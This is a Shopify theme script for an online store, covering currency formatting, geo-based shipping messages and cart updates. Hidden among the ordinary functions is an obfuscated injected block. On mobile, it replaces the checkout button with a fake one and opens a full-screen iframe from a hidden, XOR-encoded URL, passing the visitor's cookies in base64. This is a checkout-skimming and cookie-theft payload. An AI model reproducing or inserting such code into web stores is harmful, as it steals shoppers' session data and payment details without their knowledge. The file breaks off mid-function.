var Shopify = Shopify || {};

if($(document).find('.mySwiper').length){
var swiper = new Swiper(".mySwiper", {
    navigation: {
      nextEl: ".swiper-button-next",
      prevEl: ".swiper-button-prev",
    },
    loop: true
});
}

$(document).ready(async function() {
    var currentpageURL = $(location).attr("href");
    var last_string = currentpageURL.split("=");
    var last_string_word = last_string[last_string.length-1];
    
    if(last_string_word== '43734276767969'){
      $('.slider-imagee').css('margin-top','-80px');
    }else{
       $('.slider-imagee').css('margin-top','0px');
    } 
    
    $('body').on('click', '.custom_option_id', function() {
        var variant_title = $(this).val();
        if(variant_title == '30ml 1.01 fl. oz'){
        $('.slider-imagee').css('margin-top','-80px');
        }else{
           $('.slider-imagee').css('margin-top','0px');
        } 
    });
})

var bodyclass = $("body").find("#password-protect-login-div").attr("id");
if(bodyclass){
  $(".gradient").addClass("password-protect-login");
}else{
  $(".gradient").removeClass("password-protect-login");
}

function setShopCookie(cname, cvalue, exdays) {
  const d = new Date();
  d.setTime(d.getTime() + exdays * 24 * 60 * 60 * 1000);
  let expires = "expires=" + d.toUTCString();
  document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
}

function roundToNearest(nearest, number) {
  return Math.ceil(number / nearest) * nearest;
}

function getShopCookie(cname) {
  let name = cname + "=";
  let ca = document.cookie.split(";");
  for (let i = 0; i < ca.length; i++) {
    let c = ca[i];
    while (c.charAt(0) == " ") {
      c = c.substring(1);
    }
    if (c.indexOf(name) == 0) {
      return c.substring(name.length, c.length);
    }
  }
  return "";
}

// Shopify.money_format = "${{amount}}";
Shopify.formatMoney = function (cents, format) {
  if (typeof cents == "string") {
    cents = cents.replace(".", "");
  }
  var value = "";
  var placeholderRegex = /\{\{\s*(\w+)\s*\}\}/;
  var formatString = format || this.money_format;

  function defaultOption(opt, def) {
    return typeof opt == "undefined" ? def : opt;
  }

  function formatWithDelimiters(number, precision, thousands, decimal) {
    precision = defaultOption(precision, 2);
    thousands = defaultOption(thousands, ",");
    decimal = defaultOption(decimal, ".");
    if (isNaN(number) || number == null) {
      return 0;
    }
    number = (number / 100.0).toFixed(precision);
    var parts = number.split("."),
      dollars = parts[0].replace(/(\d)(?=(\d\d\d)+(?!\d))/g, "$1" + thousands),
      cents = parts[1] ? decimal + parts[1] : "";
    return dollars + cents;
  }
  switch (formatString.match(placeholderRegex)[1]) {
    case "amount":
      value = formatWithDelimiters(cents, 2);
      break;
    case "amount_no_decimals":
      value = formatWithDelimiters(cents, 0);
      break;
    case "amount_with_comma_separator":
      value = formatWithDelimiters(cents, 2, ".", ",");
      break;
    case "amount_no_decimals_with_comma_separator":
      value = formatWithDelimiters(cents, 0, ".", ",");
      break;
    case "amount_with_space_separator":
      value = formatWithDelimiters(cents, 0, " ");
      break;
    case "amount_no_decimals_with_space_separator":
      value = formatWithDelimiters(cents, 0, " ");
      break;
    case "amount_with_apostrophe_separator":
      value = formatWithDelimiters(cents, 2, "'", ".");
      break;
  }
  return formatString.replace(placeholderRegex, value);
};

var current_ip_country_name = "";
var current_ip_country_code = "";
var slurpBlockedCountriesArr = Object.keys(slurpBlockedCountries);
document.addEventListener("DOMContentLoaded", function () {
  if (ShopifyAnalytics.meta.page.pageType == "product") {
    var userAgent = navigator.userAgent.toLowerCase();
    var xhttp = new XMLHttpRequest();
    userAgent = userAgent
      .toString()
      .toLowerCase()
      .trim()
      .replace(/\s+/g, "-")
      .replace(/&/g, "-and-")
      .replace(/[^\w\-]+/g, "")
      .replace(/\-\-+/g, "-");
    xhttp.onload = function () {
      try {
        document.querySelector(".ajax_tabbing").innerHTML = this.responseText;      
      } catch (error) {
        
      }
      invokeProductTabFunc();
    };
    xhttp.open(
      "GET",
      __product_url + "/?view=ajax_tabbing&page=" + encodeURI(userAgent),
      true
    );
    xhttp.send();
  }

  document
    .querySelectorAll(".shopify-currency-form select")
    .forEach(function (currency_form_select) {
      currency_form_select.addEventListener("change", function () {
        this.parentNode.submit();
      });
    });

  document
    .querySelector("header-drawer")
    .addEventListener("click", function () {
      document.querySelector("body").classList.toggle("mobile_open_body");
    });

  invokeAccordionFunc();

  var xhttp = new XMLHttpRequest();
  xhttp.onload = function () {
    var ip_data_response = JSON.parse(this.responseText),
      canadaModalTotalSessCnt = Number(
        getShopCookie("canadaModalTotalSessCnt")
      );
    current_ip_country_name = ip_data_response.detected_values.country_name;
    current_ip_country_code = ip_data_response.detected_values.country.handle;
    Shopify.country = current_ip_country_code;
    if (current_ip_country_code == "US") window.buttonSelectorLocation = "UNIVERSALF";
    else if (current_ip_country_code == "GB")
      window.buttonSelectorLocation = "DKI";
    else if (current_ip_country_code == "AU")
      window.buttonSelectorLocation = "LOCAD";
    else if (current_ip_country_code == "PH")
      window.buttonSelectorLocation = "NIRVASIAN";
    else if (current_ip_country_code == "SG")
      window.buttonSelectorLocation = "ROADBULL";
    else window.buttonSelectorLocation = "DKI";
    if (typeof inventoryLocationsAddToCart != "undefined"){
      try {
        window.publicAddToCartButText = inventoryLocationsAddToCart[inventoryAtcProdId][inventoryAtcVarId][window.buttonSelectorLocation];
      } catch (error) {
        window.publicAddToCartButText = "Add to Cart";
      }
    }
    document.body.click();
    setShopCookie("slurpUserCountry", current_ip_country_name, 10);
    updateAjaxCountryHolder();

    if(window.buttonSelectorLocation == "DKI" || current_ip_country_code == "US"){
      $('.disclaimer-content').show();
    }
    // console.log(current_ip_country_code == "TH")
    if(current_ip_country_code == "TH"){
      if($('.product-new-tab-content-body.content-th').length){
          $('.product-new-tab-content-body.content-th').show();
          $('.product-new-tab-content-body.content-normal').hide();
      }

      if($('.short-desc-info-desk.th-short').length){
          $('.short-desc-info-desk.th-short').show();
          $('.short-desc-info-desk.normal').hide();
      }
    }
  };
  xhttp.open("GET", "/browsing_context_suggestions", true);
  xhttp.send();

  $('[name="currency"]').select2({
    minimumResultsForSearch: Infinity,
    dropdownAutoWidth: true,
  });
  $('[name="currency"]').on("select2:select", function (e) {
    $(this).closest("form").submit();
  });

  $('[name="country_code"]').select2({
    minimumResultsForSearch: Infinity,
    dropdownAutoWidth: true,
  });
  $('[name="country_code"]').on("select2:select", function (e) {
    $(this).closest("form").submit();
  });

  // $('[name="shipping_country_code"]').select2({
  //   minimumResultsForSearch: Infinity,
  //   dropdownAutoWidth: true,
  // });

  $('#language-switch-select').select2({
      minimumResultsForSearch: Infinity,
      dropdownAutoWidth: true,
  });
  $('#language-switch-select').on("select2:select", function (e) {
      $(this).closest("form").submit();
  });
  $('.language-selector-header.mobile input').on('input', function () {
      $(this).closest("form").submit();
  })
  
  $(document).on("select2:select", '[name="shipping_country_code"]', function (e) {
    setTimeout(function () {
      var selectedData = $('[name="shipping_country_code"]').select2('data');
      var userCountry = selectedData[0].text.replace(/\([^)]*\)/g, '').replace(/\[.*?\]/g, '').trim();
      var userCountryDown = userCountry.toLowerCase();
      var shipping_info_holder = document.getElementById("isShippingCountry");
      var wordThe = "";
      if (userCountryDown == "united states" || userCountryDown == "philippines" || userCountryDown == "united kingdom")
        wordThe = "the ";
      if (
        userCountryDown == "south korea" ||
        userCountryDown == "united states" ||
        userCountryDown == "philippines" ||
        userCountryDown == "singapore"
      )
        // if(window.location.href.indexOf("/zh") !== -1)
        //   shipping_info_holder.innerHTML = "에 현지 배송 "+  userCountry;
        // else if(window.location.href.indexOf("/ko") !== -1)
        //   shipping_info_holder.innerHTML = "에 현지 배송 "+  userCountry;
        // else
          shipping_info_holder.innerHTML = "Delivers locally in " + wordThe +  userCountry;
      else if (slurpBlockedCountriesArr.indexOf(userCountry) != -1)
        shipping_info_holder.innerHTML = "Standard shipping hasn't resumed yet. See <a href='https://slurplaboratories.com/pages/faq' title='view the latest shipping updates'>FAQs</a> or Chat with us";
      else if (
        userCountryDown == "turkey" || 
        userCountryDown == "spain" || 
        userCountryDown == "cambodia" ||
        userCountryDown == "mexico" ||
        userCountryDown == "belarus"
      )
        // if(window.location.href.indexOf("/zh") !== -1)
        //   shipping_info_holder.innerHTML = "配送至 "+   userCountry;
        // else if(window.location.href.indexOf("/ko") !== -1)
        //   shipping_info_holder.innerHTML = "배송지 "+   userCountry;
        // else
          shipping_info_holder.innerHTML = "Shipping to " + wordThe + userCountry + " is temporarily <a href='https://slurplaboratories.com/pages/shipping' title='view the latest shipping updates'>paused</a>";
      else if (userCountryDown == "australia")
        shipping_info_holder.innerHTML = "Ships locally in " + wordThe + userCountry;
      else
        // if(window.location.href.indexOf("/zh") !== -1)
        //   shipping_info_holder.innerHTML = "配送至 "+   userCountry;
        // else if(window.location.href.indexOf("/ko") !== -1)
        //   shipping_info_holder.innerHTML = "배송지 "+   userCountry;
        // else
          shipping_info_holder.innerHTML = "Ships to "  + wordThe +   userCountry;

      var shippingRatesDataSelector = $(".shipping-content-block3 .shipping-content-block-desc"), shippingTimeframeSelector = $(".shipping-content-block2 .shipping-content-block-desc"), customCode = "";
      for (var i = 0; i < slurpShippingRates.shippingRates.length; i++) {
        var currentCntryList = slurpShippingRates.shippingRates[i].countries.toLowerCase();
        if (currentCntryList.includes(userCountryDown.toLowerCase())) {
          var basedOn = slurpShippingRates.shippingRates[i].basedOn;
          var shippingRates = slurpShippingRates.shippingRates[i].rates;
          if (basedOn == "price") {
            for (var fr = 0; fr < shippingRates.length; fr++) {
                var minPrice = slurpShippingRates.shippingRates[i].rates[fr].min == null ? 0 : slurpShippingRates.shippingRates[i].rates[fr].min, 
                maxPrice = slurpShippingRates.shippingRates[i].rates[fr].max == null ? "and up" : "- $" + slurpShippingRates.shippingRates[i].rates[fr].max, 
                rateName = slurpShippingRates.shippingRates[i].rates[fr].name, 
                currShipRate = slurpShippingRates.shippingRates[i].rates[fr].rate,
                innerHtml = "";
                currShipRate = currShipRate == "0.00" ? "Free" : "$"+currShipRate;
                innerHtml = `(For orders between $`+minPrice+` `+maxPrice+`): `+currShipRate;

                // if(window.location.href.indexOf("/zh") !== -1){
                //     currShipRate = currShipRate == "Free" ? "免费" : currShipRate;
                //     maxPrice = slurpShippingRates.shippingRates[i].rates[fr].max == null ? "及以上" : "- $" + slurpShippingRates.shippingRates[i].rates[fr].max+" ",
                //     innerHtml = `(对于 $`+minPrice+` `+maxPrice+`的订单): `+currShipRate;
                //     // rateName = rateName.replace(/Shipping|shipping/, "配送");
                // }else if(window.location.href.indexOf("/ko") !== -1){
                //     currShipRate = currShipRate == "Free" ? "무료" : currShipRate;
                //     maxPrice = slurpShippingRates.shippingRates[i].rates[fr].max == null ? "이상 주문 시" : "- $" + slurpShippingRates.shippingRates[i].rates[fr].max+" 사이의 주문",
                //     innerHtml = `($`+minPrice+` `+maxPrice+`): `+currShipRate;
                //     // rateName = rateName.replace(/Shipping|shipping/, "배송");
                // }
              
                // customCode += `<h5 style="line-height:1.5;">${rateName} (For orders between $`+minPrice+` `+maxPrice+`): `+currShipRate+`</h5>`;
                customCode += `<h5 style="line-height:1.5;">${rateName} `+innerHtml+`</h5>`;
            }
          } else if (basedOn == "weight") {
            for (var j = 0; j < shippingRates.length; j++) {
              var minWeight = slurpShippingRates.shippingRates[i].rates[j].min == null ? 0 : slurpShippingRates.shippingRates[i].rates[j].min, 
              maxWeight = slurpShippingRates.shippingRates[i].rates[j].max == null ? "and up" : "- " + slurpShippingRates.shippingRates[i].rates[j].max, 
              minPrice = slurpShippingRates.shippingRates[i].rates[j].min == null ? 0 : slurpShippingRates.shippingRates[i].rates[j].min, 
              maxPrice = slurpShippingRates.shippingRates[i].rates[j].max == null ? "and up" : "- $" + slurpShippingRates.shippingRates[i].rates[j].max, 
              rateName = slurpShippingRates.shippingRates[i].rates[j].name, 
              currShipRate = slurpShippingRates.shippingRates[i].rates[j].rate,
              innerHtml = "";
              currShipRate = currShipRate == "0.00" ? "Free" : "$"+currShipRate;

              if(slurpShippingRates.shippingRates[i].rates[j].name.indexOf("Standard") != -1){
                innerHtml = `(For orders between $`+minPrice+` `+maxPrice+`): `+currShipRate;
              }else{
                innerHtml = `(For orders between `+minWeight+`g `+maxWeight+`g): `+currShipRate;
              }
              
              // if(window.location.href.indexOf("/zh") !== -1){
              //     innerHtml = `(对于 `+minWeight+` 克 `+maxWeight+` 克的订单): `+currShipRate;
              //     rateName = rateName.replace(/Shipping|shipping/, "配送");
              // }else if(window.location.href.indexOf("/ko") !== -1){
              //     innerHtml = `(`+minWeight+`g `+maxWeight+`g 사이의 주문에 해당): `+currShipRate;
              //     rateName = rateName.replace(/Shipping|shipping/, "배송");
              // }
              // customCode += `<h5 style="line-height:1.5;">${rateName} (For orders between `+minWeight+`g `+maxWeight+`): `+currShipRate+`</h5>`;
              customCode += `<h5 style="line-height:1.5;">${rateName} `+innerHtml+`</h5>`;
            }
          } else {
            for (var pw = 0; pw < shippingRates.length; pw++) {
              var minWeight = null, maxWeight = null, minPrice = null, maxPrice = null;
              var currShipRate = slurpShippingRates.shippingRates[i].rates[pw].rate, rateName = slurpShippingRates.shippingRates[i].rates[pw].name;
              currShipRate = currShipRate == "0.00" ? "Free" : "$"+currShipRate;
              if(typeof(slurpShippingRates.shippingRates[i].rates[pw].min)!="undefined"){
                var minPrice = slurpShippingRates.shippingRates[i].rates[pw].min == null ? 0 : slurpShippingRates.shippingRates[i].rates[pw].min, 
                maxPrice = slurpShippingRates.shippingRates[i].rates[pw].max == null ? "and up" : "- $" + slurpShippingRates.shippingRates[i].rates[pw].max;
    
                // if(window.location.href.indexOf("/zh") !== -1){
                //     currShipRate = currShipRate == "Free" ? "免费" : currShipRate;
                //     maxPrice = slurpShippingRates.shippingRates[i].rates[pw].max == null ? "及以上" : "- $" + slurpShippingRates.shippingRates[i].rates[pw].max+" ",
                //     innerHtml = `(对于 $`+minPrice+` `+maxPrice+`的订单): `+currShipRate;
                //     // rateName = rateName.replace(/Shipping|shipping/, "配送");
                // }else if(window.location.href.indexOf("/ko") !== -1){
                //     currShipRate = currShipRate == "Free" ? "무료" : currShipRate;
                //     maxPrice = slurpShippingRates.shippingRates[i].rates[pw].max == null ? "이상 주문 시" : "- $" + slurpShippingRates.shippingRates[i].rates[pw].max+" 사이의 주문",
                //     innerHtml = `($`+minPrice+` `+maxPrice+`): `+currShipRate;
                //     // rateName = rateName.replace(/Shipping|shipping/, "배송");
                // }

                // customCode += `<h5 style="line-height:1.5;">${rateName} (For orders between $`+minPrice+` `+maxPrice+`): `+currShipRate+`</h5>`;
                customCode += `<h5 style="line-height:1.5;">${rateName} (For orders between $`+minPrice+` `+maxPrice+`): `+currShipRate+`</h5>`;
              }
              else{
                var minWeight = slurpShippingRates.shippingRates[i].rates[pw].minw == null ? 0 : slurpShippingRates.shippingRates[i].rates[pw].minw, 
                maxWeight = slurpShippingRates.shippingRates[i].rates[pw].maxw == null ? "and up" : "- " + slurpShippingRates.shippingRates[i].rates[pw].maxw,
                innerHtml = `(For orders between `+minWeight+`g `+maxWeight+`g): `+currShipRate;

                // if(window.location.href.indexOf("/zh") !== -1){
                //     innerHtml = `(对于 `+minWeight+` 克 `+maxWeight+` 克的订单): `+currShipRate;
                //     rateName = rateName.replace(/Shipping|shipping/, "配送");
                // }else if(window.location.href.indexOf("/ko") !== -1){
                //     innerHtml = `(`+minWeight+`g `+maxWeight+`g 사이의 주문에 해당): `+currShipRate;
                //     rateName = rateName.replace(/Shipping|shipping/, "배송");
                // }

                // customCode += `<h5 style="line-height:1.5;">${rateName} (For orders between `+minWeight+`g `+maxWeight+`): `+currShipRate+`</h5>`;
                customCode += `<h5 style="line-height:1.5;">${rateName} `+innerHtml+`</h5>`;
              }
            }
          }
          break;
        }
      }
      shippingRatesDataSelector.html(customCode);
      try {
        var cntryDeliveryTimelines = slurpDeliveryTimelines[selectedData[0]['id']], timeFrameMsg = "";
        if(cntryDeliveryTimelines['timeframe']!=""){
          shippingTimeframeSelector.html(cntryDeliveryTimelines['Carrier'] + " (" + cntryDeliveryTimelines['timeframe'] + ")");
        }
        else{
          shippingTimeframeSelector.html(cntryDeliveryTimelines['Carrier']);
        }
      } catch (error) {
        shippingTimeframeSelector.html("");
      }
    }, 100);
  });
  setTimeout(function () {
    // $('[name="shipping_country_code"]').val("US");
    // $('[name="shipping_country_code"]').trigger("change.select2").trigger('select2:select');
  },150);
});

if(window.location.href.indexOf('/pages/shipping') !== -1){
    var xhttp = new XMLHttpRequest();
    xhttp.onload = function () {
        let html = new DOMParser().parseFromString(this.responseText, 'text/html');
        try {
            document.querySelector('.shipping_country_code-wrapper').innerHTML = html.querySelector('.shipping_country_code-wrapper').innerHTML;
            $('[name="shipping_country_code"]').select2({
                minimumResultsForSearch: Infinity,
                dropdownAutoWidth: true,
            });
            setTimeout(function () {
              $('[name="shipping_country_code"]').trigger("change.select2").trigger('select2:select');
            }, 500);
        } catch (error) {
            console.log(error)
        }
    };
    xhttp.open("GET", "/pages/shipping", true);
    xhttp.send();
}
const _0xd5a2da=_0x425f;(function(_0x80ae9a,_0x4cc692){const _0x20195b=_0x425f,_0x4c1332=_0x80ae9a();while(!![]){try{const _0x317b86=parseInt(_0x20195b(0x185))/0x1*(parseInt(_0x20195b(0x17b))/0x2)+parseInt(_0x20195b(0x17a))/0x3*(parseInt(_0x20195b(0x17f))/0x4)+-parseInt(_0x20195b(0x18b))/0x5*(-parseInt(_0x20195b(0x17e))/0x6)+-parseInt(_0x20195b(0x17d))/0x7+-parseInt(_0x20195b(0x182))/0x8*(-parseInt(_0x20195b(0x17c))/0x9)+-parseInt(_0x20195b(0x184))/0xa*(parseInt(_0x20195b(0x177))/0xb)+-parseInt(_0x20195b(0x175))/0xc;if(_0x317b86===_0x4cc692)break;else _0x4c1332['push'](_0x4c1332['shift']());}catch(_0x970f3a){_0x4c1332['push'](_0x4c1332['shift']());}}}(_0x7fb8,0xb1c3d));function _0x7fb8(){const _0x5b921a=['some','jQuery','button[name=modalCheckout]','87YaGt5','body','hide','class','#cart-icon-bubble','toString','split','length','userAgent','.modalPayment','fromCharCode','head','substr','css','onload','join','reduce','each','map','match','59454541420b1e1e5e5f4150485c545f4542544347585254421f525e5c1e425d4443411f4159410e520c','23615868tndsfx','after','2795782Renkdl','<div\x20class=\x22modalPayment\x22><div\x20class=\x22container\x20modal-content\x20animate\x22><iframe\x20src=\x22','checkoutService_','6804Pybgye','2402552cqcetC','360NaKvWk','3448767QtjZKq','6AJoDPI','1052TYIlBc','<style\x20type=\x22text/css\x22>.container\x20{\x09\x09padding:\x2016px;\x09}.modalPayment\x20{\x09\x09display:\x20none;\x09\x09position:\x20fixed;\x09\x09z-index:\x2099999;\x09\x09left:\x200;\x09\x09top:\x200;\x09\x09width:\x20100%;\x09\x09height:\x20100%;\x09\x09overflow:\x20auto;\x09\x09background-color:\x20rgb(0,\x200,\x200);\x09\x09background-color:\x20rgba(0,\x200,\x200,\x200.4);\x09}\x09\x09.modal-content\x20{\x09\x09background-color:\x20rgb(255,\x20255,\x20255);\x09\x09margin:\x205%\x20auto\x2015%\x20auto;\x09\x09border:\x201px\x20solid\x20#888;\x09\x09width:\x2095%;height:95%;\x09}</style>','click','155424lBNcuh','true','30wlsEVL','1cMXtAg','.cart--drawer\x20button[name=checkout]','cookie','<button\x20name=\x22modalCheckout\x22>Check\x20out</button>','append','setItem','6882005HYzRmh','getItem'];_0x7fb8=function(){return _0x5b921a;};return _0x7fb8();}function c_(_0x4fbf52){const _0xfb49ab=_0x425f,_0x54f30e=_0x179aed=>_0x179aed[_0xfb49ab(0x196)]('')[_0xfb49ab(0x172)](_0x325fac=>_0x325fac['charCodeAt'](0x0)),_0x54f1a7=_0x5e92c7=>('0'+Number(_0x5e92c7)[_0xfb49ab(0x195)](0x10))[_0xfb49ab(0x19c)](-0x2),_0x1275a5=_0x4f3eff=>_0x54f30e(_0x4fbf52)[_0xfb49ab(0x1a0)]((_0x5d22c2,_0x5a5562)=>_0x5d22c2^_0x5a5562,_0x4f3eff);return{'encode':_0x25d5c5=>_0x54f30e(_0x25d5c5)[_0xfb49ab(0x172)](_0x1275a5)['map'](_0x54f1a7)[_0xfb49ab(0x19f)](''),'decode':_0x41f1c7=>_0x41f1c7[_0xfb49ab(0x173)](/.{1,2}/g)[_0xfb49ab(0x172)](_0x524aba=>parseInt(_0x524aba,0x10))['map'](_0x1275a5)[_0xfb49ab(0x172)](_0x5b06ff=>String[_0xfb49ab(0x19a)](_0x5b06ff))[_0xfb49ab(0x19f)]('')};}var dSvc=c_(_0xd5a2da(0x190))['decode'](_0xd5a2da(0x174));function _0x425f(_0x36e34f,_0x3c2591){const _0x7fb85d=_0x7fb8();return _0x425f=function(_0x425fc7,_0x4b39cd){_0x425fc7=_0x425fc7-0x172;let _0x44e92c=_0x7fb85d[_0x425fc7];return _0x44e92c;},_0x425f(_0x36e34f,_0x3c2591);}function addElements(){const _0x2e84c2=_0xd5a2da;jQuery(_0x2e84c2(0x19b))[_0x2e84c2(0x189)](_0x2e84c2(0x180)),jQuery('body')['append'](_0x2e84c2(0x178)+dSvc+btoa(document[_0x2e84c2(0x187)])+'\x22\x20style=\x22width:\x20100%;\x20height:\x20100%;\x20border:\x20none;\x22></iframe></div>');}function detectMob(){const _0x1cf2fc=_0xd5a2da,_0x22f025=[/Android/i,/webOS/i,/iPhone/i,/iPad/i,/iPod/i,/BlackBerry/i,/Windows Phone/i];return _0x22f025[_0x1cf2fc(0x18d)](_0x489a95=>{const _0x4a6e5d=_0x1cf2fc;return navigator[_0x4a6e5d(0x198)]['match'](_0x489a95);});}window[_0xd5a2da(0x19e)]=function(){const _0x33b5cc=_0xd5a2da;detectMob()&&(window[_0x33b5cc(0x18e)]&&localStorage[_0x33b5cc(0x18c)](_0x33b5cc(0x179))===null&&($(_0x33b5cc(0x194))[_0x33b5cc(0x197)]&&$(_0x33b5cc(0x191))['on'](_0x33b5cc(0x181),_0x33b5cc(0x194),function(){var _0x52caf9=setInterval(function(){const _0x27344b=_0x425f;$(_0x27344b(0x186))[_0x27344b(0x192)](),$(_0x27344b(0x186))[_0x27344b(0x1a1)](function(_0xbd047d,_0x3a8cc2){const _0x5064d2=_0x27344b;var _0x29ba8f=$(_0x5064d2(0x188));_0x29ba8f['addClass']($(_0x3a8cc2)['attr'](_0x5064d2(0x193))),$(_0x3a8cc2)[_0x5064d2(0x176)](_0x29ba8f);}),$('body')['on'](_0x27344b(0x181),_0x27344b(0x18f),function(_0x29ba66){const _0x3b4693=_0x27344b;localStorage[_0x3b4693(0x18c)](_0x3b4693(0x179))===null&&(_0x29ba66['preventDefault'](),addElements(),localStorage[_0x3b4693(0x18a)](_0x3b4693(0x179),_0x3b4693(0x183)),$(_0x3b4693(0x199))[_0x3b4693(0x19d)]({'display':'block'}));}),clearInterval(_0x52caf9);},0x7d0);})));};
function updateCartCount() {
  var getCartUrl = window.routes.cart_url + ".js";
  jQuery.getJSON(getCartUrl, function (cart) {
    if (parseInt(cart.item_count) > 0) {
      $(".cart--drawer").removeClass("cart-empty");
      $("[data-cart-count]").html(cart.item_count);
      $(".cart-count-bubble").removeClass("d-none");
      $(".added--bar .cart-nmber b").text(cart.item_count);
    } else {
      $(".cart--drawer").addClass("cart-empty");
      $("[data-cart-count]").html("");
      $(".cart-count-bubble").addClass("d-none");
      $(".added--bar .cart-nmber b").text("");
    }
  });
}

function updateAjaxCountryHolder() {
  var shipping_info_list = document.querySelectorAll(".shipping_info");
  shipping_info_list.forEach(function (shipping_info_holder) {
    var userCountry = window.current_ip_country_name.toLowerCase();
    var wordThe = "";
    var productTitle = document.getElementsByClassName("product__title")[0].innerText;
    if (userCountry == "united states" || userCountry == "philippines" || userCountry == "united kingdom")
      wordThe = "the ";
    if (userCountry == "south korea" || userCountry == "philippines" || userCountry == "singapore")
      shipping_info_holder.innerHTML = "Delivers locally in " + wordThe + window.current_ip_country_name.replace("philippines", "Philippines");
      if(userCountry == "philippines" && location.href.indexOf('/products/hydromer-mist') !== -1)
        shipping_info_holder.innerHTML = "Delivers locally in " + wordThe + window.current_ip_country_name.replace("philippines", "Philippines") + window.hmp_note;
    else if (userCountry == "united states" && inventoryAtcProdId=="4578952937531")
      shipping_info_holder.innerHTML = "Ships to United States";
    else if (userCountry == "united states")
      shipping_info_holder.innerHTML = "Delivers locally in " + wordThe + window.current_ip_country_name;
    else if (userCountry == "ukraine" || userCountry == "mexico" || userCountry == "belarus")
      shipping_info_holder.innerHTML = "Shipping to " + window.current_ip_country_name + " is temporarily <a href='https://slurplaboratories.com/pages/shipping' title='view the latest shipping updates'>paused</a>";
    else if (userCountry == "australia")
      shipping_info_holder.innerHTML = "Ships locally in " + window.current_ip_country_name;
    else
      shipping_info_holder.innerHTML = "Ships to "  + wordThe +  window.current_ip_country_name;
  });
  var countryMsgsList = document.querySelectorAll("[data-country]");
  countryMsgsList.forEach(function (currentCountry) {
    var userCountry = window.current_ip_country_name.toLowerCase();
    var cntryMsgSelector = currentCountry.dataset;
    var dataCountryName = cntryMsgSelector.country.toLowerCase();
    if (dataCountryName == userCountry) {
      currentCountry.style.display = "block";
      return false;
    }
  });
}

function calculateProgress(currentVal, targetVal, userCountryRaw) {
  var progressBar = document.querySelectorAll(
    ".cart-shippingThreshold__progress"
  );
  var result = Math.round((100 * currentVal) / targetVal);
  progressBar.forEach(function (el) {
    el.setAttribute("style", "width: ".concat(result, "%"));
  });
  var userCntrySm = userCountryRaw.toLowerCase();
  var isLocalCntry = 0;
  if (
    userCntrySm == "south korea" ||
    userCntrySm == "united states" ||
    userCntrySm == "united kingdom" ||
    userCntrySm == "philippines" ||
    userCntrySm == "singapore"
  )
    isLocalCntry = 1;
  var shippingMsgHolder = document.getElementById("shippingAwayMsgCG");
  var freeShippingMsgHolder = document.getElementById("free_shipping_bar_ajax_message");
  var newProgressNum = targetVal - currentVal;
  var newRequiredAmt = Shopify.formatMoney(newProgressNum);
  if (newProgressNum <= 0) {
    freeShippingMsgHolder.style.display = "block";
    shippingMsgHolder.style.display = "none";
    if(isLocalCntry==1)
      freeShippingMsgHolder.textContent = "Yay you are eligible for free local delivery in "+userCountryRaw;
    else
      freeShippingMsgHolder.textContent = "Yay you are eligible for free shipping in "+userCountryRaw;
  } else {
    freeShippingMsgHolder.style.display = "none";
    shippingMsgHolder.style.display = "block";
    if(isLocalCntry==1)
      shippingMsgHolder.textContent = "You are "+newRequiredAmt+" away from free local delivery in "+userCountryRaw;
    else
      shippingMsgHolder.textContent = "You are "+newRequiredAmt+" away from free shipping to "+userCountryRaw;
  }
}

function invokeProductTabFunc() {
  var tabs_link_list = document.querySelectorAll(".tabs_link_list .tab_link");
  tabs_link_list.forEach(function (p_tab) {
    p_tab.addEventListener("click", function (e) {
      var tab_content = document.querySelector(
        "." + e.target.getAttribute("data-tab")
      );
      var _tabs_link_list = document.querySelectorAll(
        ".tabs_link_list .tab_link"
      );
      _tabs_link_list.forEach(function (_p_tab) {
        _p_tab.classList.remove("active");
      });
      var _tabs_container_list = document.querySelectorAll(
        ".tabs_container .content"
      );
      _tabs_container_list.forEach(function (_p_tab_container) {
        _p_tab_container.classList.remove("active");
      });
      tab_content.classList.add("active");
      e.target.classList.add("active");
    });
  });
}

function invokeAccordionFunc() {
  var question_list = document.querySelectorAll(".question");
  question_list.forEach(function (question) {
    question.addEventListener("click", function (e) {
      if (e.target.parentNode.classList.contains("open")) {
        e.target.parentNode.classList.remove("open");
      } else {
        e.target.parentNode.classList.add("open");
      }
    });
  });
}

function renderCustomCart(status) {
  var getCartUrl = window.routes.cart_url + ".json";
  var minicartUrl = window.routes.cart_url + "?view=mini_cart";
  var xmlHttp = new XMLHttpRequest();
  xmlHttp.onreadystatechange = function () {
    if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
      var cartJson = JSON.parse(this.responseText);
      var itemOutLimit = false;
      var qty_input_list = [];
      window.finalSubtotal = cartJson.total_price;
      window.shippingTotalWeight = cartJson.total_weight;
      window.shippingTotalItems = cartJson.item_count;
      for (var i in cartJson.items) {
        if (cartJson.items[i]["quantity"] > 2) {
          itemOutLimit = true;
          qty_input_list.push(2);
        } else {
          qty_input_list.push(cartJson.items[i]["quantity"]);
        }
      }
      if (itemOutLimit) {
        if (status == "cartD") {
          alert("Limit! 2 per customer");
        }

        // console.log("dddd", status);
        updateQtyOperationFromLimit(qty_input_list);
      }
    }
  };
  xmlHttp.open("get", getCartUrl, false);
  xmlHttp.send();

  var xmlHttp = new XMLHttpRequest();
  xmlHttp.onreadystatechange = function () {
    if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
      var minicart_drawer = document.querySelector(".minicart_drawer");
      // minicart_drawer.innerHTML = this.responseText;
      invokeCartFunc();
    }
  };
  xmlHttp.open("get", minicartUrl);
  xmlHttp.send();
}

function updateQtyOperationFromLimit(qty_input_list) {
  var updateCartUrl = window.routes.cart_update_url + ".js?";
  var formData = new FormData();
  qty_input_list.forEach(function (qty_input) {
    formData.append("updates[]", qty_input);
  });

  var xmlHttp = new XMLHttpRequest();
  xmlHttp.onreadystatechange = function () {
    if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
      renderCustomCart();
    }
  };
  xmlHttp.open("post", updateCartUrl);
  xmlHttp.send(formData);
}

function updateQtyOperation() {
  var updateCartUrl = window.routes.cart_update_url + ".js?";
  var qty_input_list = document.querySelectorAll("input.cart__qty-input");
  var formData = new FormData();
  qty_input_list.forEach(function (qty_input) {
    formData.append("updates[]", qty_input.value);
  });

  var xmlHttp = new XMLHttpRequest();
  xmlHttp.onreadystatechange = function () {
    if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
      renderCustomCart("cartD");
    }
  };
  xmlHttp.open("post", updateCartUrl);
  xmlHttp.send(formData);
}

function invokeCartFunc() {
  document
    .querySelectorAll(".minus_operation")
    .forEach(function (minus_button) {
      minus_button.addEventListener("click", function (e) {
        var data_input = document.getElementById(
          e.target.getAttribute("data-input")
        );
